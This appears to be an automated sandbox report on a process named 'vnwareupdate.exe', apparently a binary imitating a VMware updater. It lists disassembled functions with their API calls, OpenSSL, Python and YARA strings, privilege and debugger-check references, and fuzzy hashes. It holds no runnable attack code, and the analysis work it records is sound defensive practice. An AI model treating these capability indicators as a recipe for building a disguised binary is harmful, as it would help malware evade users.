Function 02D41695, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

PyObject_Malloc.PYTHON27(?,02E55188), ref: 02D416A1
PyObject_Init.PYTHON27(00000000), ref: 02D416AB
PyString_FromString.PYTHON27(?), ref: 02D416BF
PyString_FromString.PYTHON27(?), ref: 02D416CD

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: FromObject_StringString_$InitMalloc
String ID:
API String ID: 3199475769-0
Opcode ID: 3cdc017b82d60c1e8c3bcdf35e860db0628715e4734e71ec00ce33c835d4c72f
Instruction ID: e57cb7597618a75904c4ab44413d149893e556d88351877185cba1df1e028e15
Opcode Fuzzy Hash: 3cdc017b82d60c1e8c3bcdf35e860db0628715e4734e71ec00ce33c835d4c72f
Instruction Fuzzy Hash: 4FF06D709807109FC3208F6AA888416BBF4FF44716B505E6EE94A83300D735E5A5CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02DB5490, Relevance: 5.4, APIs: 4, Instructions: 419COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45a2e82421e2082b92fded628e63fc986dedb7dd582aba8070e2eec9e04ac97
Instruction ID: db864f0575fb02b1538baac82d61aed10e4cb6c3bb39d7930d7d85406d697b01
Opcode Fuzzy Hash: c45a2e82421e2082b92fded628e63fc986dedb7dd582aba8070e2eec9e04ac97
Instruction Fuzzy Hash: F9D16DB5604204AFD715DE68DC94EBBB7EAEFC9704F44891CF98687344E631EC058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02D4D8FC, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D4D98C

Strings

, xrefs: 02D4D9D3
,, xrefs: 02D4D9BF

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: $,
API String ID: 885266447-71045815
Opcode ID: 01494e3657a1809197817acb10d10c24bbb472b9d38721ab0876bb09de048b12
Instruction ID: df3a83f101d2296050219866587e72ffc4b1f3471654450a30e2ef7f6e4f36cc
Opcode Fuzzy Hash: 01494e3657a1809197817acb10d10c24bbb472b9d38721ab0876bb09de048b12
Instruction Fuzzy Hash: B941E7B0A097029FC314CF19D584A2AFBE1FF88700F148A5AE48987325E774ED95CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02DAFD50, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,?,00000000,?,02DB0798,00000000,?,0000000B,00000000), ref: 02DAFD84

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02DAFDA8, 02DAFDC6, 02DAFDF2, 02DAFE26, 02DAFE36

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 626452242-79188018
Opcode ID: 4e13cd5db0e7df0dc9728d17be6e77d6d5b58872f8c29044dc3024f3ca4737be
Instruction ID: 535e5ab5b823c9533cb0c09e065943cd88711b3bcd8a3e495ac86bde92b24506
Opcode Fuzzy Hash: 4e13cd5db0e7df0dc9728d17be6e77d6d5b58872f8c29044dc3024f3ca4737be
Instruction Fuzzy Hash: 65210672BD43143EF6202AB57C96F573358C780F59F444861FB0DEA7C2E2D6A89485B4

Uniqueness

Uniqueness Score: -1.00%

Function 02D899B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 02D89770: GetStdHandle.KERNEL32(000000F4), ref: 02D8978C
Part of subcall function 02D89770: GetFileType.KERNEL32(00000000), ref: 02D89799
Part of subcall function 02D89770: _vsnprintf.MSVCR90 ref: 02D897B7
Part of subcall function 02D89770: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D897DA

raise.MSVCR90 ref: 02D899CB
_exit.MSVCR90 ref: 02D899D5

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 02D899BF

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleTypeWrite_exit_vsnprintfraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 1829284227-569889646
Opcode ID: 2133476396a4ea27cf3790a385a5b4bf87eaf26dacab310b6a92cce36f91411a
Instruction ID: fdc6114ae6df345f45cc132f88774aebd74d524517c6975055aae28fc9f38e03
Opcode Fuzzy Hash: 2133476396a4ea27cf3790a385a5b4bf87eaf26dacab310b6a92cce36f91411a
Instruction Fuzzy Hash: 06F0E2BB6882103FE500A679DCA19BBB7E9DFDA720F11950DF5C983384C671AC458A62

Uniqueness

Uniqueness Score: -1.00%

Function 02D41D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON27(02A9A968,line %d: %s,?,?), ref: 02D41D97

Strings

%s(%d): %s, xrefs: 02D41D78
line %d: %s, xrefs: 02D41D91

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format
String ID: %s(%d): %s$line %d: %s
API String ID: 376477240-3587166966
Opcode ID: c976bf53f953bd227271b53ff0a371451bf12940b5ce7f7a1aa3ba4bcae8b31b
Instruction ID: 5890f3f6e87ba5459327a004109ff46cd01d68196b0733b2e0355a75f4fb3369
Opcode Fuzzy Hash: c976bf53f953bd227271b53ff0a371451bf12940b5ce7f7a1aa3ba4bcae8b31b
Instruction Fuzzy Hash: 01F07FB4A98301EFD314CF16D544A1BB7E4BB88651F80DD5DF4A883300D774D895CB56

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vnwareupdate.exe PID: 6352 Parent PID: 2540 vnwareupdate.exeCOMMON

Executed Functions

Function 02DB3A10, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00008000,00000000,02DB39AE), ref: 02DB3A19

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 5d6ab6706387d475590bf26f1b840b0f507fa67c9bcfb2802eebebe13a05f7d4
Instruction ID: 21b980c55d4c7b67f239d051fcb44dde6f4031b62fca789b2bbc60580607ba1f
Opcode Fuzzy Hash: 5d6ab6706387d475590bf26f1b840b0f507fa67c9bcfb2802eebebe13a05f7d4
Instruction Fuzzy Hash: 82C08C72AD4B0106E2100A768C0BB0421602320B10FE05A11B291C81C0E95840840500

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02E10380, Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 244encryptionCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02E103D2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 02E103F7
GetLastError.KERNEL32 ref: 02E1042B
CryptAcquireContextW.ADVAPI32(F0000000,00000000,00000000,?,F0000000), ref: 02E10460
CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000001), ref: 02E10499
GetLastError.KERNEL32 ref: 02E104CD
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02E104E2
CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 02E1057C
GetLastError.KERNEL32 ref: 02E105C2
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02E10633

Strings

Container name %s, len=%d, index=%d, flags=%d, xrefs: 02E10590
Enumerate bug: using workaround, xrefs: 02E1060B
%lu. %s, xrefs: 02E105B1
Got max container len %d, xrefs: 02E104F1
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02E10419, 02E10482, 02E104BB, 02E10514, 02E10540, 02E105EA, 02E1061F
Listing containers CSP=%s, type = %d, xrefs: 02E103A7

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$ContextErrorLast$ByteCharMultiParamProvReleaseWide$Acquire
String ID: %lu. %s$..\..\openssl-1.1.0e\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Got max container len %d$Listing containers CSP=%s, type = %d
API String ID: 2639310310-608761734
Opcode ID: 71ed69de35e48b70f0b1edbf2d584e4a9443869e592199b551aca0c5d027f66d
Instruction ID: 2fb92041e86141cb3fc2fdb5df9591935d43f8f35a991587729a4d92cbbe9864
Opcode Fuzzy Hash: 71ed69de35e48b70f0b1edbf2d584e4a9443869e592199b551aca0c5d027f66d
Instruction Fuzzy Hash: F071FBB0FC0204BBE720ABA5DC89F6F7769EB40748F50D829F909E7381D77199918B61

Uniqueness

Uniqueness Score: -1.00%

Function 02E10AA0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000004,00000001,00000001,?,?,00000000), ref: 02E10B90
GetLastError.KERNEL32 ref: 02E10BC4

Strings

, xrefs: 02E10B70
capi_get_key, contname=%s, RSA_AES_CSP, xrefs: 02E10AED
capi_get_key, contname=%s, provname=%s, type=%d, xrefs: 02E10B38
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02E10AB6, 02E10B49, 02E10B59, 02E10BB2, 02E10C03, 02E10C34

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: AcquireContextCryptErrorLast
String ID: $..\..\openssl-1.1.0e\engines\e_capi.c$capi_get_key, contname=%s, RSA_AES_CSP$capi_get_key, contname=%s, provname=%s, type=%d
API String ID: 2322988497-2057759941
Opcode ID: f5e85cd63a3ca9d562c30a1e0606b998d2165212f4437eb09a01419b526cd787
Instruction ID: a08fe77c2e67800a0a5a582962df35dd212068f70431a35270d1de0bfc0adf8b
Opcode Fuzzy Hash: f5e85cd63a3ca9d562c30a1e0606b998d2165212f4437eb09a01419b526cd787
Instruction Fuzzy Hash: CB415C71AC0300ABE720AF60EC89F2B7395FB80B0DF50982AF94996240E771D5958FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DB6250, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

SeDebugPrivilege, xrefs: 02DCE801

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID: SeDebugPrivilege
API String ID: 4292702814-2896544425
Opcode ID: 302651419e30a3085982226ecf0d5ac92c1ed49bf5be058823d1083f21542954
Instruction ID: d5b5bc3be480b6ba0af37b67ebb70bfde438a47dd739549bf62a0a1b329ba3fc
Opcode Fuzzy Hash: 302651419e30a3085982226ecf0d5ac92c1ed49bf5be058823d1083f21542954
Instruction Fuzzy Hash: F831AFB0A44301AFD354DF19C848B5BBBE4EF88744F6489ADF5898B3A1E730D944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02E10E90, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 131encryptionCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02E10ED1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,?,000000FF,00000000,00000000), ref: 02E10EF4
CryptAcquireContextW.ADVAPI32(?,00000000,?,?,F0000000,?,000000FF,?,00000000,?,000000FF,00000000,00000000), ref: 02E10F12
CryptReleaseContext.ADVAPI32(?,00000000,?,?,F0000000,?,000000FF,?,00000000,?,000000FF,00000000,00000000), ref: 02E10F22
GetLastError.KERNEL32 ref: 02E10FB1

Strings

capi_ctx_set_provname, name=%s, type=%d, xrefs: 02E10EB1
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02E10F30, 02E10F60, 02E10F9F, 02E10FDD

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharContextCryptMultiWide$AcquireErrorLastRelease
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c$capi_ctx_set_provname, name=%s, type=%d
API String ID: 2868654666-2278323642
Opcode ID: 882b044336e30ba243404a5de3a6818b5b647eeb4e9a60d24938c66e072e3802
Instruction ID: 093db8b8b67b8ed3d71d00de3a3a0d2f5abbf746b6f6724c5608e187bb150bf5
Opcode Fuzzy Hash: 882b044336e30ba243404a5de3a6818b5b647eeb4e9a60d24938c66e072e3802
Instruction Fuzzy Hash: B6410B71FC0204ABEB20AF65DC4AF9B3369EB44758F509525F909DB3C0DA7199608BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E6AD3E, Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02E6B43B
_crt_debugger_hook.MSVCR90(00000001), ref: 02E6B448
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02E6B450
UnhandledExceptionFilter.KERNEL32(02EB2D88), ref: 02E6B45B
_crt_debugger_hook.MSVCR90(00000001), ref: 02E6B46C
GetCurrentProcess.KERNEL32(C0000409), ref: 02E6B477
TerminateProcess.KERNEL32(00000000), ref: 02E6B47E

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID:
API String ID: 3369434319-0
Opcode ID: c4698a9c8337598be67f59b088ffbdece98268fca05fb1c46e74c8117235cbd2
Instruction ID: 23d762fd23d164654080fe990f3d76dca8ef93549da9f2dbde21b5ad226d5ee1
Opcode Fuzzy Hash: c4698a9c8337598be67f59b088ffbdece98268fca05fb1c46e74c8117235cbd2
Instruction Fuzzy Hash: 9521C0B4DC03049FD700DFABE14865A3BB8BB88749FA0983AE45997248E77059E6CF11

Uniqueness

Uniqueness Score: -1.00%

Function 02DA6FD0, Relevance: 94.9, APIs: 32, Strings: 31, Instructions: 374COMMON

Download Yara Rule

APIs

_snprintf.MSVCR90 ref: 02DA7000
_snprintf.MSVCR90 ref: 02DA7020
_snprintf.MSVCR90 ref: 02DA7040
_snprintf.MSVCR90 ref: 02DA7060
_snprintf.MSVCR90 ref: 02DA7080
_snprintf.MSVCR90 ref: 02DA70A0
_snprintf.MSVCR90 ref: 02DA70C0
_snprintf.MSVCR90 ref: 02DA70E0
_snprintf.MSVCR90 ref: 02DA7100
_snprintf.MSVCR90 ref: 02DA7120
_snprintf.MSVCR90 ref: 02DA7140
_snprintf.MSVCR90 ref: 02DA7160
_snprintf.MSVCR90 ref: 02DA7180
_snprintf.MSVCR90 ref: 02DA71A0
_snprintf.MSVCR90 ref: 02DA71B9
_snprintf.MSVCR90 ref: 02DA71D2
_snprintf.MSVCR90 ref: 02DA71EB
_snprintf.MSVCR90 ref: 02DA7204
_snprintf.MSVCR90 ref: 02DA721D
_snprintf.MSVCR90 ref: 02DA723D
_snprintf.MSVCR90 ref: 02DA725D
_snprintf.MSVCR90 ref: 02DA7276
_snprintf.MSVCR90 ref: 02DA7296
_snprintf.MSVCR90 ref: 02DA72AF
_snprintf.MSVCR90 ref: 02DA72CF
_snprintf.MSVCR90 ref: 02DA72E8
_snprintf.MSVCR90 ref: 02DA7301
_snprintf.MSVCR90 ref: 02DA731A
_snprintf.MSVCR90 ref: 02DA7333
_snprintf.MSVCR90 ref: 02DA7364
_snprintf.MSVCR90 ref: 02DA7384
_snprintf.MSVCR90 ref: 02DA739D

Strings

could not read file, xrefs: 02DA7396
duplicated metadata identifier "%s", xrefs: 02DA7079
"%s" is not a function, xrefs: 02DA7179
duplicated structure member, xrefs: 02DA726F
division by zero, xrefs: 02DA72FA
not enough memory, xrefs: 02DA6FF9
wrong use of anonymous string, xrefs: 02DA71B2
invalid module name "%s", xrefs: 02DA7256
unknown module "%s", xrefs: 02DA7236
include circular reference, xrefs: 02DA71CB
'for <quantifier> of <string set>' loops can't be nested, xrefs: 02DA7216
duplicated tag identifier "%s", xrefs: 02DA7059
loop nesting limit exceeded, xrefs: 02DA71FD
invalid field name "%s", xrefs: 02DA7199
wrong return type for overloaded function, xrefs: 02DA72A8
integer overflow in "%s", xrefs: 02DA737D
duplicated string identifier "%s", xrefs: 02DA7039
regular expression is too large, xrefs: 02DA7313
empty string "%s", xrefs: 02DA7119
"%s" is not an array or dictionary, xrefs: 02DA7159
undefined identifier "%s", xrefs: 02DA70D9
unreferenced string "%s", xrefs: 02DA70F9
regular expression is too complex, xrefs: 02DA732C
duplicated loop identifier "%s", xrefs: 02DA7099
wrong arguments for function "%s", xrefs: 02DA728F
undefined string "%s", xrefs: 02DA70B9
"%s" is not a structure, xrefs: 02DA7139
duplicated identifier "%s", xrefs: 02DA7019
too many strings in rule "%s" (limit: %d), xrefs: 02DA735D
internal fatal error, xrefs: 02DA72E1
too many levels of included rules, xrefs: 02DA71E4

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _snprintf
String ID: "%s" is not a function$"%s" is not a structure$"%s" is not an array or dictionary$'for <quantifier> of <string set>' loops can't be nested$could not read file$division by zero$duplicated identifier "%s"$duplicated loop identifier "%s"$duplicated metadata identifier "%s"$duplicated string identifier "%s"$duplicated structure member$duplicated tag identifier "%s"$empty string "%s"$include circular reference$integer overflow in "%s"$internal fatal error$invalid field name "%s"$invalid module name "%s"$loop nesting limit exceeded$not enough memory$regular expression is too complex$regular expression is too large$too many levels of included rules$too many strings in rule "%s" (limit: %d)$undefined identifier "%s"$undefined string "%s"$unknown module "%s"$unreferenced string "%s"$wrong arguments for function "%s"$wrong return type for overloaded function$wrong use of anonymous string
API String ID: 3512837008-3960654680
Opcode ID: 771718e52ce397222fe5f01c6120771471783f66a109dbfe453a58a73a0be475
Instruction ID: 99801e02bd3555839c9568d3d1cca064367dd19b1ce76a985ce68d4397c9047e
Opcode Fuzzy Hash: 771718e52ce397222fe5f01c6120771471783f66a109dbfe453a58a73a0be475
Instruction Fuzzy Hash: 38A19032BC45216BE2419B5DFC0DCDFB7ACDFC0E19F044827F68DD2211C6A05DA286AA

Uniqueness

Uniqueness Score: -1.00%

Function 02DA28A0, Relevance: 85.9, APIs: 25, Strings: 24, Instructions: 144COMMON

Download Yara Rule

APIs

Py_InitModule4.PYTHON27(yara,02EB5E40,This module allows you to apply YARA rules to files or strings.For complete documentation please visit:https://plusvic.github.io/yara,00000000,000003F5), ref: 02DA28B7
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_CONTINUE,00000000), ref: 02DA28DA
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_ABORT,00000001), ref: 02DA28E4
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_MATCHES,00000001), ref: 02DA28EE
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_NON_MATCHES,00000002), ref: 02DA28F8
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_ALL,00000003), ref: 02DA2902
PyModule_AddStringConstant.PYTHON27(00000000,__version__,3.10.0), ref: 02DA2915
